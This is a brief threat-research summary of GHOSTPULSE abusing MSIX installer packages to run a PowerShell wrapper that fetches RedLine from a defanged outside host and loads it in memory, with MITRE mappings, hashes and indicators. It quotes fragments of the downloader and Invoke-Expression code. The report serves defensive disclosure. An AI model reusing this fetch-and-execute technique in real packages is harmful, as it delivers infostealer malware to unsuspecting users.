Threat Research

Redline Dropped Through MSIX Package

Securonix

MSIX packaging is being abused to deliver malware, with GHOSTPULSE leveraging automatic PowerShell execution during MSIX installation to run a payload. The analysis shows a VoiceMode (1).msix sample that uses a wrapper to trigger worldhack.ps1, which downloads and loads a remote PE payload (RedLine) in memory. #GHOSTPULSE #RedLine

Keypoints

  • MSIX can automatically execute a PowerShell script during installation, enabling stealthy malware delivery.
  • A sample VoiceMode (1).msix contains StartingScriptWrapper.ps1 and config.json to orchestrate payload execution.
  • The wrapper passes a scriptPath from config.json (worldhack.ps1) to be executed via Invoke-Expression.
  • The worldhack.ps1 downloads a remote payload with System.Net.WebClient.DownloadData and loads it as a .NET assembly.
  • The downloaded payload is a RedLine component that is loaded in memory and executed through its EntryPoint.
  • The sample has a SHA256 hash 82db2d060d69ab6f88b85b79cf16255ee30982db1228d6e94ea02bf4feb2f181 with low VT detection, indicating stealthy delivery.
  • The article warns to pay close attention to MSIX-based delivery as MSIX usage grows among attackers.

MITRE Techniques

  • [T1059.001] PowerShell – The wrapper uses PowerShell to execute a script during package installation via Invoke-Expression, as shown by ‘Param ( [Parameter(Mandatory=$true)] [string]$ScriptPathAndArguments ) try { invoke-expression $scriptPathAndArguments } catch { write-host $_.Exception.Message … }’ and ‘scriptPath”: “worldhack.ps1”.
  • [T1105] Ingress Tool Transfer – The script downloads a remote payload with ‘DownloadData(“hxxps://browse-plus[.]com/didicert.jpg”)’ and loads it as a .NET assembly for execution.
  • [T1055] Process Injection (in-memory) – The downloaded payload is loaded into memory via ‘[System.Reflection.Assembly]::Load($Name1)’ and its EntryPoint is invoked, effectively running the payload in the PowerShell process.

Indicators of Compromise

  • [URL] Remote payload URL – hxxps://browse-plus[.]com/didicert.jpg
  • [SHA256] 82db2d060d69ab6f88b85b79cf16255ee30982db1228d6e94ea02bf4feb2f181
  • [SHA256] a16abe0ece8dac8f512a23f81daf704ec3c797de3334b73f1f5fcb0be5370f62
  • [File] VoiceMode (1).msix – sample MSIX package
  • [File] StartingScriptWrapper.ps1 – wrapper script inside the MSIX

Read more: https://isc.sans.edu/diary/rss/30404

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint